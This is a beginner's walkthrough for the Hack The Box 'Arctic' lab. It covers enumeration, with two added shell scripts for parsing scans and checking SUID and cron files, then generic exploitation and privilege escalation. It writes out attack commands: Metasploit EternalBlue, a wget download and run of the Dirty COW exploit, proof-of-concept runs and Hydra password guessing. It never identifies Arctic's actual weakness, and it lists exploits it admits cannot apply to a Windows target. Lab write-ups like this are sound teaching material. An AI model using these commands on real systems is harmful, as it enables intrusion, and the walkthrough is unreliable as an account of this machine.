Retired Machine: Arctic

The “Arctic” machine on Hack The Box is a retired, easy-rated target that models the kind of weaknesses met in real assessments and lets newcomers practise penetration-testing technique in a controlled environment. This walkthrough is written for novices and works through the compromise of Arctic step by step.

Arctic Machine Overview:

Arctic is a vulnerable Windows-based machine exposing the kind of services commonly met in security assessments. The objective is to gain a foothold as a low-privileged user, escalate to administrative privileges, and retrieve the flags that prove each step.

Initial Enumeration:

To initiate the process of compromising the Arctic machine, the first step is thorough enumeration, which involves gathering information about the target system. Here’s how to do it:

Nmap Scanning:

  • Use Nmap to map the services the target exposes on the network.
  • The command nmap -sV -p- <target_IP> scans all 65535 TCP ports (-p-) and runs version detection (-sV) to identify the services and versions behind them. A full -p- -sV scan is slow, so add -oA <basename> to save the results in all three output formats for later parsing, and remember that UDP services (SNMP, for example) need a separate -sU scan.
  • Example: nmap -sV -p- -oA arctic_full 10.10.10.10

Analyzing Nmap Results:

  • Review the scan for open ports, the service and version on each, and anything unexpected.
  • Pay attention to services on well-known ports (HTTP on 80, SSH on 22, SMB on 445) and their versions, but do not ignore high or non-standard ports: on lab machines the application that provides the way in is often listening there.

Identifying Entry Points:

  • Look for entry points that could be exploited, such as:
    • Outdated software versions: Services running outdated versions may have known vulnerabilities that can be exploited.
    • Misconfigured services: Services with default or weak configurations may provide opportunities for unauthorized access.

Additional Enumeration Techniques:

  • If SMB or MSRPC is exposed, enumerate it with enum4linux or smbmap; if UDP 161 is open, query it with snmpwalk (try the community string public first).
  • Enumerate web services with Dirb or Gobuster to find directories and files that are not linked from the site itself.

Documentation and Note-Taking:

  • Document all findings, including open ports, identified services, and potential vulnerabilities, in a structured manner.
  • Take notes on interesting observations or findings that could be useful during later stages of the penetration testing process.

Careful enumeration with Nmap and the follow-up tools produces the service inventory that every later step depends on: the exploit you choose must match a version you actually observed.
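As an added example (this script is not part of the original walkthrough and is not an Nmap component), the shell below turns a grepable Nmap report into a service inventory and derives the follow-up enumeration command for each open port, using the tools this page recommends. The report embedded in it is constructed sample data for the placeholder host 10.10.10.10, not a scan of Arctic; the wordlist path is the one used later on this page.

```shell
#!/bin/sh
# Added example for this walkthrough (not from the original page): turn a
# grepable Nmap report (nmap -sV -p- -oG -) into a service inventory and
# pick the follow-up enumeration step for each open port. SAMPLE_SCAN is
# CONSTRUCTED sample data, not output from the Arctic machine; 10.10.10.10
# is the placeholder address used elsewhere on this page.

SAMPLE_SCAN='# Nmap 7.94 scan initiated as: nmap -sV -p- -oG - 10.10.10.10
Host: 10.10.10.10 ()	Status: Up
Host: 10.10.10.10 ()	Ports: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8/, 25/closed/tcp//smtp///, 80/open/tcp//http//Apache httpd 2.4.18/, 445/open/tcp//microsoft-ds///	Ignored State: filtered (65531)
# Nmap done -- 1 IP address (1 host up) scanned'

TAB="$(printf '\t')"

# inventory REPORT
# Prints one tab-separated line per OPEN port: host port proto service version
# ("-" stands in for a service or version that -sV could not identify).
inventory() {
    printf '%s\n' "$1" | awk '
        BEGIN { OFS = "\t" }
        /^Host:/ && index($0, "Ports: ") {
            host  = $2
            ports = substr($0, index($0, "Ports: ") + 7)
            sub(/[ \t]+Ignored State:.*$/, "", ports)
            n = split(ports, entry, ", ")
            for (i = 1; i <= n; i++) {
                # -oG port fields: port/state/proto/owner/service/rpcinfo/version/
                split(entry[i], f, "/")
                if (f[2] != "open") continue
                service = (f[5] == "") ? "-" : f[5]
                version = (f[7] == "") ? "-" : f[7]
                print host, f[1], f[3], service, version
            }
        }'
}

# followups REPORT
# Maps each open service to the next enumeration command, following the tool
# choices made in this walkthrough (enum4linux/smbmap for SMB, Nikto/Gobuster
# for HTTP). A port with no version string gets a manual banner grab first,
# because -sV then only guessed the service from the port number.
followups() {
    inventory "$1" | while IFS="$TAB" read -r host port proto service version; do
        case $service in
            http|http-alt|http-proxy)
                echo "nikto -h http://$host:$port"
                echo "gobuster dir -u http://$host:$port -w /usr/share/wordlists/dirb/common.txt" ;;
            https|"ssl|http")
                echo "nikto -h https://$host:$port" ;;
            microsoft-ds|netbios-ssn)
                echo "enum4linux -a $host"
                echo "smbmap -H $host" ;;
            ssh)
                echo "nmap -p $port --script ssh2-enum-algos $host" ;;
        esac
        if [ "$version" = "-" ]; then
            echo "nc -nv $host $port   # no banner identified: grab it by hand"
        else
            echo "searchsploit \"$version\"   # then narrow to the exact version"
        fi
    done
}

inventory "$SAMPLE_SCAN"
followups "$SAMPLE_SCAN"
```

With a real scan saved by -oA, feed the .gnmap file in: inventory "$(cat arctic_full.gnmap)". The version string is passed to searchsploit verbatim as a starting point; Exploit-DB titles use product names rather than distribution package versions, so expect to shorten the query by hand.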

Service Enumeration:

After Nmap has identified the open ports, gather more detail about each service before looking for exploits. Enum4linux, Nikto, and Dirb cover the common cases (SMB, web server configuration, and web content respectively):

Using Enum4linux:

  • Enum4linux queries Windows and Samba hosts over SMB and MSRPC.
  • Run enum4linux <target_IP> (equivalent to enum4linux -a, all of the simple enumeration checks) to start.
  • It attempts null-session and anonymous access to list shares, users, groups, the password policy, and OS details. Modern hosts refuse most of these queries, so an empty result is itself a finding: anonymous access is closed and credentials will be needed.
  • Example: enum4linux 10.10.10.10

Using Nikto:

  • Nikto is a web server scanner that checks for dangerous files, outdated server software, and common misconfigurations.
  • Run nikto -h <target_IP> to scan the web server on port 80; pass a full URL (nikto -h http://<target_IP>:<port>) when the service is on another port or uses TLS.
  • Nikto is noisy and reports many informational items; treat its output as a list of things to verify by hand rather than as confirmed vulnerabilities.
  • Example: nikto -h http://10.10.10.10:80

Using Dirb:

  • Dirb is a web content scanner used to discover hidden directories and files on web servers.
  • Launch Dirb with the command dirb http://<target_IP>/ <wordlist_path>.
  • Dirb will recursively scan the target web server using a specified wordlist to discover directories and files.
  • Example: dirb http://10.10.10.10/ /usr/share/wordlists/dirb/common.txt

Analyzing Results:

  • Review the results from Enum4linux, Nikto, and Dirb to identify potential points of entry or vulnerabilities.
  • Pay close attention to any sensitive information or misconfigurations that could be exploited during subsequent stages of the penetration testing process.

Used together, these tools give you the SMB and web-application picture: which shares and accounts exist, how the web server is configured, and which paths are worth testing by hand before any exploit is chosen.

Vulnerability Identification:

To identify vulnerabilities in the services and versions found during enumeration on the Arctic machine, follow these steps:

  1. Research Known Vulnerabilities:
  • Use Exploit Database (and searchsploit, its offline copy) and CVE Details to search for vulnerabilities in the exact software versions identified.
  • Match on the services you actually observed, such as web servers, databases, or other network services.
  • Note the severity, exploitability, and impact of each vulnerability.
  • Treat version banners with care: distribution packages often backport fixes while keeping the upstream version number, and version detection can be wrong for services on unusual ports. Confirm the version from a second source (a banner grab, an error page, a package changelog) before assuming a bug is present.
  2. Exploit Database:
  • Search Exploit Database by product and version (searchsploit <product> <version> does the same against the local copy; titles use product names, so also try the name without the version).
  • Review the results for exploits that target the exact service and version, and note whether each is remote or local and whether it needs authentication.
  • Record the exploit names, descriptions, and the path or URL of the exploit code.
  3. CVE Details:
  • Search CVE Details for the identified products and versions.
  • Read the CVE entries for the affected version ranges and the nature of each bug.
  • Record the CVE identifiers that apply to the versions you observed; they are the key for finding both exploit code and the vendor's fix.
  4. Analyze Specific Vulnerabilities:
  • For each candidate CVE or exploit, understand what it does and what it requires (network access, credentials, user interaction).
  • Weigh exploitability, severity, and whether those conditions hold in the target environment.
  • Remote code execution, SQL injection, and authentication bypass are the classes that lead directly to a foothold on the Arctic machine.
  5. Prioritize Vulnerabilities:
  • Order the candidates by likelihood of success and impact, starting with unauthenticated remote code execution in a confirmed version.
  • Prefer reliable exploits over ones that may crash the service: a crashed service on a lab box usually means waiting for a reset.

By researching specific vulnerabilities associated with the services and versions discovered during enumeration, you can better understand the potential attack surface and prioritize your exploitation efforts during penetration testing on the Arctic machine.

Exploitation:

The exploit used at this stage has to follow from a service version you actually observed during enumeration. The enumeration above does not establish any particular CVE on Arctic, so the entries below are examples of common exploit classes and of how each is driven, not findings from the machine. Several of them (Dirty COW, and the Pulse Secure and Citrix appliance bugs) apply only to Linux hosts or network appliances and cannot be used against a Windows target. The script names pulse_secure.py, citrix_traversal.py and libssh_auth_bypass.py are placeholders for whichever public proof of concept you obtain, not the names of specific tools; read any proof of concept before running it.

  1. CVE-2017-0143 – Windows SMB Remote Code Execution:
  • Exploit: EternalBlue (MS17-010)
  • Method: Confirm the host is unpatched first (Nmap's smb-vuln-ms17-010 script, or Metasploit's auxiliary/scanner/smb/smb_ms17_010), then use the Metasploit EternalBlue module to gain SYSTEM-level code execution over SMB (TCP 445). The exploit can crash an unstable target, so run it once and wait for the session rather than retrying immediately.
  • Command (Metasploit):
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS <target_IP>
    set LHOST <attacker_IP>
    exploit
  2. CVE-2019-11510 – Pulse Secure VPN Arbitrary File Disclosure:
  • Exploit: pre-authentication path traversal in Pulse Connect Secure
  • Method: Use a proof-of-concept script to read arbitrary files from the appliance, starting with /etc/passwd to confirm the bug and then the configuration files and credential stores it exposes.
  • Command:
    python pulse_secure.py -u https://<target_IP>:443 -f /etc/passwd
  3. CVE-2016-5195 – Linux Kernel Dirty COW Privilege Escalation:
  • Exploit: Dirty COW
  • Method: A race condition in the kernel's copy-on-write handling lets a local user write to files they can only read, so this is used after a foothold to modify a root-owned file. Kernels patched after October 2016 are not affected, and the exploit can hang or crash the target, so check uname -r against the distribution's fixed versions first.
  • Command:
    wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
    gcc -pthread dirtyc0w.c -o dirtyc0w
    ./dirtyc0w <read_only_target_file> <bytes_to_write>
  4. CVE-2019-19781 – Citrix ADC/NetScaler Directory Traversal:
  • Exploit: path traversal in Citrix ADC and Gateway
  • Method: Use a proof-of-concept script to read arbitrary files from the appliance, such as sensitive configuration files; the same bug was chained by public exploits into code execution.
  • Command:
    python citrix_traversal.py --url https://<target_IP> --file /etc/passwd
  5. CVE-2018-10933 – libssh Authentication Bypass:
  • Exploit: libssh server-side authentication bypass
  • Method: Only servers built on the libssh library (0.6 up to the fixed 0.7.6 and 0.8.4 releases) are affected; OpenSSH is not, so check that the SSH banner names libssh before trying it. The bypass sends an SSH2_MSG_USERAUTH_SUCCESS message to the server, which then treats the client as authenticated.
  • Command:
    python libssh_auth_bypass.py -t <target_IP> -p 22

Whichever exploit matches the versions you observed, the aim is a foothold (a shell as some user) from which privilege escalation proceeds. Only run exploits against systems you are authorised to test.

Privilege Escalation:

The escalation path depends on what the foothold reveals, so start with local enumeration rather than a specific exploit. The checks below are the standard ones for a Linux foothold and are listed as methodology; on a Windows host such as Arctic the first steps are instead whoami /priv and systeminfo (privileges held and patch level), and the sudo, SUID and cron checks do not apply.

  1. Sudo Misconfiguration:
  • Exploit: misconfigured sudo rules
  • Method: List what the current user may run through sudo. Entries tagged NOPASSWD, or that allow a program able to spawn a shell or write files (editors, interpreters, tar, find), lead straight to root; GTFOBins documents the escape for each binary.
  • Command:
    sudo -l
  2. SUID/SGID Binaries:
  • Exploit: setuid and setgid binaries
  • Method: These run with the privileges of their owner or group instead of the caller's. Compare the list against what the distribution ships by default: a custom binary, or a standard one in a version with a known local exploit, is the interesting case.
  • Command:
    find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
  3. Kernel Exploitation:
  • Exploit: kernel local privilege escalation
  • Method: Match the exact kernel version (uname -a) against known local exploits such as Dirty COW (CVE-2016-5195). Kernel exploits are a last resort: they can panic the machine, and a deliberately misconfigured lab target rarely needs one.
  • Command:
    uname -a
    searchsploit linux kernel local
  4. Cron Jobs:
  • Exploit: writable scripts run by cron as root
  • Method: Read the system crontab and the cron directories for jobs that run as root. If the script a job executes, or a directory on the crontab's PATH that precedes the real one, is writable by you, whatever you place there runs as root on the next schedule.
  • Command:
    cat /etc/crontab
    ls -la /etc/cron.*
    ls -la /var/spool/cron/crontabs 2>/dev/null    # /var/spool/cron on Red Hat derivatives
  5. Weak Passwords:
  • Exploit: guessing weak passwords for accounts found during enumeration
  • Method: Try the usernames collected so far with short, targeted password lists rather than huge ones: online guessing is slow, noisy in the target's logs, and can lock accounts. Credentials found in configuration files or scripts on the box should be tried first, including against other users.
  • Command (Hydra):
    hydra -l <username> -P <password_list> ssh://<target_IP>

Whichever path works, the result is a shell as root (or SYSTEM on Windows) from which the final flag can be read. Only perform these steps on systems you are authorised to test.
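As an added example (not from the original walkthrough), the shell below implements the SUID and cron checks described above as functions that take a root directory, so they can be exercised against a constructed mock filesystem before being pointed at a real Linux target with /. The standard-binary list, the mock tree and its file names are assumptions made for the example; nothing here applies to a Windows host.

```shell
#!/bin/sh
# Added example (not from the original page): the SUID and cron checks this
# section describes, written as functions that take a root directory so they
# can be tried against a CONSTRUCTED mock filesystem first and then run with
# ROOT=/ on a real Linux target. Nothing here applies to a Windows host.

# Setuid binaries shipped by most Linux distributions (assumed list). Anything
# outside it is worth a look (and a GTFOBins lookup by name); the listed ones
# can still be vulnerable in specific versions, so this is a triage filter only.
STANDARD_SUID='passwd su sudo mount umount ping ping6 chsh chfn newgrp gpasswd chage expiry fusermount fusermount3 pkexec'

# suid_binaries ROOT - regular files with the setuid bit, skipping the pseudo
# filesystems that only add noise and permission errors.
suid_binaries() {
    prefix=${1%/}       # "" when ROOT is /, so "$prefix/proc" becomes /proc
    find "${prefix:-/}" \( -path "$prefix/proc" -o -path "$prefix/sys" -o -path "$prefix/dev" \) -prune \
         -o -type f -perm -4000 -print 2>/dev/null
}

# unusual_suid ROOT - setuid binaries whose name is not in STANDARD_SUID.
unusual_suid() {
    suid_binaries "$1" | while read -r path; do
        name=$(basename "$path")
        case " $STANDARD_SUID " in
            *" $name "*) ;;
            *) echo "$path" ;;
        esac
    done
}

# writable_cron_scripts ROOT - system cron entries whose program is an absolute
# path the current user can write to. /etc/crontab and /etc/cron.d/* use the
# seven-field format "min hour dom mon dow user command"; @reboot-style lines
# carry the schedule in one field, so the remaining fields shift left by four.
writable_cron_scripts() {
    prefix=${1%/}
    for f in "$prefix/etc/crontab" "$prefix"/etc/cron.d/*; do
        [ -f "$f" ] || continue
        grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$f" |
        while read -r min hour dom mon dow user cmd; do
            case $min in
                @*) cmd="$dom $mon $dow $user $cmd"; user=$hour ;;
            esac
            prog=${cmd%% *}
            case $prog in
                /*) if [ -w "$prefix$prog" ]; then
                        echo "$user runs $prog (writable) from $f"
                    fi ;;
            esac
        done
    done
}

# mock_root - throwaway tree with two setuid files (one standard, one not), a
# root cron job whose script is world-writable, and decoy entries that must
# not be reported. Prints the directory; remove it when done.
mock_root() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/etc/cron.d" "$root/opt/backup" "$root/proc"
    printf '#!/bin/sh\n' > "$root/usr/bin/passwd";        chmod 4755 "$root/usr/bin/passwd"
    printf '#!/bin/sh\n' > "$root/usr/bin/custom-helper"; chmod 4755 "$root/usr/bin/custom-helper"
    printf '#!/bin/sh\n' > "$root/proc/fake-suid";        chmod 4755 "$root/proc/fake-suid"   # pruned
    printf '#!/bin/sh\ntar czf /var/backups/www.tgz /var/www\n' > "$root/opt/backup/run.sh"
    chmod 777 "$root/opt/backup/run.sh"
    printf '%s\n' '# constructed system crontab' 'SHELL=/bin/sh' 'PATH=/usr/bin:/bin' \
        '*/10 * * * * root /opt/backup/run.sh' \
        '17 * * * * root cd / && run-parts --report /etc/cron.hourly' > "$root/etc/crontab"
    printf '%s\n' '@reboot root /usr/local/bin/agent' > "$root/etc/cron.d/agent"   # target does not exist
    echo "$root"
}

ROOT=$(mock_root)
echo "unusual setuid binaries:"; unusual_suid "$ROOT"
echo "writable cron targets:";   writable_cron_scripts "$ROOT"
rm -rf "$ROOT"
```

Against the mock tree only /usr/bin/custom-helper and the world-writable /opt/backup/run.sh are reported: the setuid file under proc is pruned, the cd-based job has no absolute program path, and the @reboot job points at a file that does not exist. On a real foothold, call unusual_suid / and writable_cron_scripts / and read the remaining hits by hand.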

Flag Retrieval:

Hack The Box machines carry two flags. user.txt sits in the home directory of the low-privileged account compromised first and can be read as soon as the foothold is gained; root.txt sits in the administrator's home directory (on a Windows host, the Administrator's Desktop) and is readable only after privilege escalation. Submitting each flag on the platform records the corresponding step.

Conclusion:

The Arctic machine on Hack The Box provides an opportunity for beginners to gain hands-on experience with penetration testing techniques in a safe and controlled environment. By following this walkthrough, novices can learn essential skills in vulnerability identification, exploitation, and privilege escalation, ultimately enhancing their understanding of cybersecurity concepts.